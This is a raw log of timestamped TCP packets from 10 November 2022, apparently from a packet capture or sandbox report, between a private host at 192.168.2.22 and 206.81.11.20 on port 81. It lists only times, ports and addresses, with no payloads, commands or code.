Nov 10, 2022 11:43:14.776578903 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776618958 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776659012 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776659966 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776690960 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776700974 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776741982 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776743889 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776783943 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776839972 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776839972 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776880980 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776921988 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776932001 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776962996 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777004004 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.777004004 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777046919 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777086020 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.777087927 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777129889 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777169943 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.777169943 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777211905 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777250051 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.777252913 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777297974 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777339935 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777343035 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.777396917 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777436018 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777439117 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.777477026 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777518034 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.777518034 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777559996 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777599096 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.777601004 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777642965 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777683020 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.777684927 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777725935 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777765989 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.777769089 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777811050 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.777848959 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.826205015 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.826272964 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.826318979 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.826319933 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.826360941 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.826400042 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.826457024 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.829077005 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.829133034 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.829154015 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.829174995 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.829215050 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.829219103 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.829261065 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.829303980 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.829489946 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.829535961 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.829576015 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.829646111 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.829690933 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.829729080 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.829731941 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831073046 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831115007 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831132889 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831135988 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831157923 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831170082 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831180096 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831198931 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831216097 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831218004 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831237078 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831255913 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831258059 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831275940 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831294060 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831296921 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831316948 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831331968 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831336021 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831353903 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831368923 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831372976 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831392050 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831408978 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831408978 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831428051 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831444979 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831445932 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831455946 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831465960 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831484079 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831484079 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831502914 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831520081 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831521988 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831540108 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831556082 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831558943 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831577063 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831592083 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831594944 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831613064 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831633091 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831634998 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831634998 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831650972 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831666946 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831669092 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831686974 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831702948 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831705093 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831718922 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831737041 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831742048 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831756115 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831772089 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831774950 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831793070 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831799984 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831811905 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831828117 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831830978 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831850052 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831867933 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831867933 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831887007 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831902981 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831904888 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831923962 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831939936 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831942081 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831959963 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831965923 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.831979036 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831996918 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.831999063 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832015038 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832032919 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832034111 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832051039 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832070112 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832091093 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832115889 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832125902 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832140923 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832140923 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832165003 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832176924 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832189083 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832214117 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832222939 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832237959 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832262993 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832273006 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832289934 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832298994 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832314968 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832325935 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832339048 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832362890 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832375050 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832387924 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832412004 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832429886 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832436085 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832469940 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832470894 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832492113 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832509995 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832535028 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832537889 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832560062 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832572937 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832583904 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832607031 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832619905 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832629919 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832633972 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832654953 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832668066 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832678080 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832701921 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832712889 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832727909 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832751036 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832762957 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832775116 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832799911 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832801104 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832823038 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.832835913 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.832984924 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.833189011 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.940440893 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.940643072 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.043207884 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.043373108 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.147089958 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.147119999 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.147281885 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.148319960 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.248801947 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.248871088 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.249001026 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.249047995 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.249886990 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.249931097 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.249967098 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.249994040 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.354494095 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.354599953 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.354645967 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.354717970 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.354729891 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.354765892 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.354788065 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.354847908 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.355051041 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.355117083 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.355122089 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.355181932 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.355190039 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.355256081 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.355257988 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.355318069 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456001043 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456038952 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456077099 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456121922 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456314087 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456336021 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456357956 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456358910 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456372023 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456381083 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456384897 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456402063 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456413984 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456423044 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456427097 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456444979 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456454039 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456465006 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456473112 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456485033 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456494093 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456506014 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456515074 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456537008 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456559896 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456582069 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456593990 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456608057 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456619024 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456640959 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.456650972 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.456671000 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557277918 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557315111 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557332039 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557347059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557387114 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557414055 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557425022 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557432890 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557434082 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557434082 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557449102 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557461023 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557466030 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557478905 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557492018 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557502985 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557516098 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557549000 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557557106 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557568073 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557568073 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557576895 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557591915 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557591915 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557629108 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557646036 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557672977 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557683945 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557780027 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557817936 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557837963 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557847977 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557851076 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557858944 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557864904 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557878017 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557885885 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557893991 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557894945 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557904005 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557912111 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557919979 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557928085 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557929993 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557943106 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557946920 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557955980 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557964087 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557979107 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557986975 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.557995081 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.557997942 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.558008909 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.558011055 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.558023930 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.558043957 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.558481932 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:15.659593105 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:15.659677982 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:49.787929058 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:49.891248941 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:49.891490936 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:49.893093109 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:49.996054888 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.163309097 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.163360119 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.163382053 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.163407087 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.163448095 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.163471937 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.163491011 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.163513899 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.163517952 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.163517952 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.163537979 CET	81	49174	206.81.11.20	192.168.2.22
